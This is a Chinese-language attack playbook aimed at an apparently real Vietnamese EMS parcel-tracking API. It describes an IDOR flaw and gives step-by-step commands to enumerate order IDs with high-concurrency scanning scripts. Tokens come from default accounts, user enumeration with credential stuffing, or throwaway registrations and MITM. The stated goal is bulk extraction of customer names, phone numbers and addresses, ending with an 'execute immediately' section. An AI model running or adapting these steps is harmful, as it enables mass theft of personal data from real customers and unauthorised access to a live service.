╔══════════════════════════════════════════════════════════════╗
║         运单号查询 - 发现与利用                              ║
╚══════════════════════════════════════════════════════════════╝

【核心发现】

✅ 有运单号追踪功能!

API: http://ws.ems.com.vn/api/v1/orders/tracking/{订单ID}
方法: GET
认证: 需要Token
参数: 无 (不传user_id!)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【关键特征】

1. 必须有Token
   ❌ 不能公开查询
   ✅ 登录后可以查询

2. 只验证Token
   • 不传user_id
   • 不验证所有权
   • 只要有Token就能查任意订单ID

3. IDOR风险
   如果后端不验证:
     → 用1个Token可以遍历所有订单
     → 比列表API更直接

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【利用方法】

方法1: 订单ID遍历 (推荐)

# 自动化工具
python3 tracking_scanner.py \
  --token "YOUR_TOKEN" \
  --mode id \
  --start 1000000 \
  --count 10000

# 手动测试
export TOKEN="你的Token"
curl "http://ws.ems.com.vn/api/v1/orders/tracking/1000000" \
  -H "Authorization: Bearer $TOKEN"

功能:
  • 批量遍历订单ID
  • 多线程高速扫描
  • 自动导出JSON/CSV
  • 生成统计报告

输出:
  • tracking_scan_*.json (所有订单数据)
  • tracking_scan_*.csv (表格)
  • tracking_scan_report_*.txt (报告)


方法2: 运单号格式扫描

# 如果知道运单号格式
python3 tracking_scanner.py \
  --token "YOUR_TOKEN" \
  --mode tracking \
  --pattern "EM*VN" \
  --count 10000

常见运单号格式:
  • EM{9位数字}VN
  • VN{10位数字}
  • EMS{8位数字}
  • {纯数字}

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【与其他方法对比】

方法              | Token | 能获取          | 速度
────────────────────────────────────────────────────
订单列表API       | ✅   | 自己的订单      | 慢 (分页)
追踪API (本方法)  | ✅   | 任意订单 (IDOR) | 快 (直接)
IDOR批量扫描      | ✅   | 所有订单        | 最快
用户枚举          | ❌   | 用户列表        | 中

本方法优势:
  ✓ 比列表API更直接
  ✓ 可以精确指定订单ID
  ✓ 可能绕过列表的过滤
  ✓ 高速并发扫描

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【完整获取订单流程】

步骤1: 获取Token

# 方案A: 测试账号
python3 test_default_accounts.py

# 方案B: 用户枚举 + 凭证填充
python3 no_register_attack.py --enum

# 方案C: 注册
# 接码平台 → 注册 → MITM获取Token

步骤2: 扫描订单

# 使用追踪API遍历
python3 tracking_scanner.py \
  --token "$TOKEN" \
  --mode id \
  --start 1000000 \
  --count 100000 \
  --workers 200

# 结果:
#   • tracking_scan_*.json (所有订单)
#   • 包含客户姓名、电话、地址

步骤3: 对比验证

# 同时运行IDOR扫描对比
python3 mass_idor_extractor.py \
  --token "$TOKEN" \
  --mode range \
  --start 1000000 \
  --end 1100000

# 对比两种方法获取的数据
# 确认IDOR是否存在

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【代码证据】

客户端实现 (c/b/s/a.java:89):

public static void q(String orderId, ...) {
    b.a("http://ws.ems.com.vn/api/v1/orders/tracking/" + orderId, 
        new HashMap(),  // ⚠️ 空参数，不传user_id!
        ...);
}

关键点:
  • 只传订单ID
  • 参数为空HashMap
  • 完全依赖后端验证
  • 客户端没有所有权检查

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【工具清单】

1. tracking_scanner.py (新) ⭐
   专门用于追踪API的批量扫描
   
   python3 tracking_scanner.py --token TOKEN

2. mass_idor_extractor.py
   通过列表API扫描
   
   python3 mass_idor_extractor.py --token TOKEN

3. backend_validation_test.py
   验证IDOR是否存在
   
   python3 backend_validation_test.py TOKEN_A TOKEN_B

推荐: 同时使用两个工具，获取最全数据

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【立即执行】

# 1. 获取Token
python3 test_default_accounts.py

# 2. 扫描订单
export TOKEN=$(cat token_*.txt | head -1)
python3 tracking_scanner.py --token "$TOKEN" --mode id --count 10000

# 3. 查看结果
cat tracking_scan_*.json | jq '.[0]'

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

总结: 发现运单号追踪功能，可以通过遍历订单ID获取所有订单!

生成日期: 2025-11-01
